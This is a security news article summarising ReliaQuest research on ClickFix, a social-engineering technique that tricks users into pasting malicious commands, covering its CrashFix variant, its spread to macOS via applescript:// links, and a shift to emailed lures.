And the Winner in Dominant Malware Delivery? ClickFix

Cybercrime’s New Favorite: ClickFix Malware Delivery Technique Dominates Threat Landscape

In just two years, ClickFix has evolved from a niche social engineering tactic to the go-to method for malware attacks. According to research by ReliaQuest, this highly effective technique is no longer an exception, but the rule, dominating initial access and defense-evasion categories in recent months.

ClickFix works by tricking targeted individuals into copying and pasting malicious commands into system dialogs like Windows Terminal. Attackers present victims with error messages or verification prompts that appear legitimate, often through CAPTCHA requests or search engine optimization (SEO) poisoning. This approach bypasses traditional file scanning and email-based defenses, making it a favorite among threat actors.

One notable variant of ClickFix is the “CrashFix” technique, which repeatedly crashes users’ browsers and presents malicious commands as a remedy. Others have weaponized AI models through SEO poisoning, further increasing their effectiveness. ReliaQuest’s analysis reveals that not only has ClickFix seen a significant rise in attacks over the past two years but also an expansion of its reach to macOS systems.

The researchers observed ClickFix activity on macOS for the first time, with attackers deploying the Atomic macOS Stealer, also known as AMOS. While ClickFix activity on macOS had been observed before, threat actors have shifted their tactics, using applescript:// links that automatically open Script Editor and run malicious commands. This change was likely designed to bypass a warning added in macOS 26.4 that appears when users paste commands into the Terminal command-line app.

The shift towards ClickFix as the preferred malware delivery technique has significant implications for security teams. As ClickFix attacks drive nearly 28% of defense-evasion activity through command and file obfuscation techniques, defenders must adapt their strategies to keep pace with threat actors. ReliaQuest’s report highlights a specific ClickFix loader designed to deliver “Deepload” malware, which uses AI-generated obfuscation to hide the malware’s logic.

One notable trend observed by ReliaQuest is that ClickFix activity has shifted from delivery via compromised websites to emailed links instead. While this shift may theoretically favor defenders, as emailed lures must pass through gateways and sandboxing before being clicked, attackers continue to use a variety of effective ClickFix vectors to gain initial access.

The rise of ClickFix highlights the need for security teams to stay vigilant and adapt their defenses continuously. As threat actors increasingly rely on this technique, defenders must prioritize monitoring and response coverage for both Windows and macOS systems. By understanding the tactics and techniques used by attackers, organizations can better protect themselves against these evolving threats.


Source: Dark Reading — 2026-07-01